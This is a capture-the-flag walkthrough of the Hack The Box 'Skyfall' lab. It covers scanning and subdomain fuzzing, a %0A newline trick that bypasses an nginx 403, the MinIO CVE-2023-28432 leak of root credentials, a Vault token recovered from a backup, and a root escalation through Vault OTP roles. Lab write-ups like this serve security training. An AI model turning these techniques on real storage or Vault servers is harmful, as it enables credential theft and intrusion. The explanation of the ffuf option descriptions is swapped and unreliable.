Introduction to Skyfall:
This write-up will explore the “Skyfall” machine from Hack the Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Skyfall” machine from Hack The Box by achieving the following objectives:
User Flag:
Exploit Vulnerabilities:
- Exploit a parser issue between nginx and Flask on a demo website to access the MinIO status page and identify the MinIO domain.
- Exploit a MinIO vulnerability to retrieve admin credentials, then access the MinIO cluster and find a backup with a sensitive Vault token in the Bash configuration.
Gain Access:
Use the Vault token to access the Vault instance, leading to successful SSH access.
Root Flag:
Unseal Vault:
Execute a script to unseal the Vault as root, generating a log file that is not initially readable.
Enumerating the Skyfall Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.254
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $nmap -sC -sV 10.10.11.254 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 17:52 EDT
Nmap scan report for 10.10.11.254
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $
Analysis:
Port 22 (SSH): Secure Shell service running OpenSSH 8.9p1 for remote access.
Port 80 (HTTP): Web server running nginx 1.18.0; website title is “Skyfall – Introducing Sky Storage!”
Web Enumeration on Skyfall machine:
Perform web enumeration to discover potentially exploitable directories and files.
gobuster dir -u http://10.10.11.254/ -w /usr/share/wordlists/dirb/common.txt
Gobuster Output:
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $gobuster dir -u http://10.10.11.254 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 178] [--> http://10.10.11.254/assets/]
Progress: 20116 / 20117 (100.00%)
===============================================================
Finished
===============================================================
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $
Analysis:
- /assets: Found (Status: 301 Redirect, Size: 178 bytes) [Redirects to: http://10.10.11.254/assets/]
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $gobuster vhost -u http://skyfall.htb/ -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://skyfall.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
Gobuster VHOST Enumeration:
- Scanned 4990 hosts; 99.98% completed.
- No additional virtual hosts were found.
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.skyfall.htb' -u http://skyfall.htb
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://skyfall.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.skyfall.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
old [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 172ms]
mail [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 176ms]
pop [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 183ms]
imap [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 186ms]
localhost [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 187ms]
mail2 [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 186ms]
mx [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 186ms]
ns3 [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 187ms]
Gobuster VHOST Enumeration:
- Numerous subdomains returned status 200.
┌─[✗]─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $ffuf -c -ac -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.skyfall.htb' -u http://skyfall.htb
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://skyfall.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.skyfall.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
demo [Status: 302, Size: 217, Words: 23, Lines: 1, Duration: 237ms]
:: Progress: [4989/4989] :: Job [1/1] :: 225 req/sec :: Duration: [0:00:34] :: Errors: 0 ::
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $
Gobuster Command Options:
-c:
Description: This option enables colored output in the terminal.
Usage: This is particularly useful in situations where you encounter responses with varying Content-Length values that could otherwise lead to misinterpretation. By ignoring this header, you avoid false positives and can focus on the actual content of the responses rather than differences in size.
-ac:
Description: The -ac option tells Gobuster to ignore the Content-Length header in HTTP responses.
Usage: When you run Gobuster with the -c flag, the results will be color-coded, making it easier to distinguish between different types of HTTP responses at a glance. For example, successful requests might be highlighted in green, while redirects could appear in yellow.
Status Code 302 (Found):
These paths are redirected, indicating they are directories:
- /demo
Website Exploration
A tab redirects to the /demo page.
However, we are redirected to a new subdomain page.
After adding the subdomain to the /etc/hosts
, we accessed the site and were redirected to a login page. We were also presented with the credentials: guest/guest.
We gained access to the dashboard successfully.
One task that caught my attention is “Access Minio Storage Security.“
What is Minio Storage Security?
MinIO is a high-performance, software-defined object storage server designed for both consumer and enterprise hardware, compatible with various operating systems and architectures.
One of the deployment options is the Single-Node Single-Drive (SNSD) or “Standalone” mode. In this configuration, a single MinIO server is paired with one storage volume or folder. While it offers some level of failover protection, the reliability depends on the underlying storage system.
SNSD is ideal for evaluating MinIO and for the initial development of applications requiring object storage. This setup utilizes a zero-parity erasure coding backend, which supports features like versioning and object locking/retention.
More information can be found here
Clicking on the metrics leads to a 403 Forbidden page.
We can bypass this by appending `%0A` (newline character) to the URL
Scrolling down the page, I discovered the MinIO endpoint.
We identified an information disclosure vulnerability in MinIO (CVE-2023-28432) that can be exploited to expose sensitive information.
CVE-2023-28432
MinIO, a Multi-Cloud Object Storage framework, has an information disclosure vulnerability in cluster deployments from RELEASE.2019-12-17T23-16-33Z up to RELEASE.2023-03-20T20-16-18Z. This issue allows exposure of all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. All distributed deployment users are affected. To mitigate this vulnerability, it is recommended to upgrade to RELEASE.2023-03-20T20-16-18Z.
The proof of concept (POC) can be found here
Accessing the page normally results in the error displayed above.
By adding %0A
, we should obtain the same output as shown in the screenshot above.
We can also view the output through Burp Suite.
Sensitive information retrieved:
We have accessed confidential details, including environment variables like MINIO_ROOT_USER and MINIO_ROOT_PASSWORD. This information is crucial for the security of the MinIO system and could potentially be used to compromise the application or gain unauthorized access.
Exploitation on Skyfall machine
Web Application Exploitation:
Next, download the script here to manage the MinIO container.
We need to grant execute permissions to the file.
What This Command Does:
- Create a Shortcut:
- The command sets up a simple name,
myminio
, which to accessing a cloud storage service, so you don’t have to remember all the details each time.
- The command sets up a simple name,
- Connect to Storage:
- It connects to the storage service at the given web address using your unique access and secret codes.
- Easier Access:
- After running this command, you can easily perform tasks like uploading or downloading files by just using the
myminio
shortcut.
- After running this command, you can easily perform tasks like uploading or downloading files by just using the
The command mc admin info myminio
is used with the MinIO Client (mc
) to get information about your MinIO server. Here’s a breakdown:
What It Does:
- Fetch Server Details: This command provides key information about the MinIO server you’re connected to using the
myminio
alias. It shows details like the server version, its status, and storage usage.
Example:
Running mc admin info myminio
will give you a summary of the server, including its version, how much storage is being used, and other important technical details.
To view all files in the container, download the package locally. After browsing the files, another address was discovered in the .bashrc
file
Extract the file on your local machine.
VAULT_ADDR: Specify the Vault server address.
VAULT_TOKEN: Specify your authentication token.
How it works:
You need to set these values on your machine so that your system knows where to connect to Vault and how to authenticate. This setup allows you to interact with Vault and perform operations as needed.
Vault script
First, set up vault-ssh-helper
on the target server to replace the default Linux login mechanism. When a user attempts to log in, vault-ssh-helper
will check their credentials with the Vault server.
Here’s the process:
- Log into Vault and generate a one-time password (OTP) for the target server.
- Connect to the server remotely and provide the OTP.
If vault-ssh-helper
verifies the OTP, and access is granted. After successful authentication, the Vault server deletes the OTP to ensure it’s used only once.
We need to download the file to our machine and extract it for use.
Connect to the Vault, examine the SSH roles, and generate an OTP token for SSH access.
We can use the token to gain access to the Vault.
Listing the SSH roles reveals several options, but currently, we have access only to dev_otp_key_role
.
Now, log in using the OTP role:
We can read the user flag by executing the command cat user.txt
.
Escalate to Root Privileges Access
Privilege Escalation:
I am seeking commands that I am permitted to run with sudo
, as shown by sudo -l
.
Let’s examine the contents of the YAML file.
After executing the following command, we observe that a debug.log
file is created
Re-run the process, and it works like a charm.
Next, replace the existing Vault Token with a new one.
After assigning the admin_otp_key_role
, we can log in as root!
We can read the root flag by executing the command cat root.txt
.
No responses yet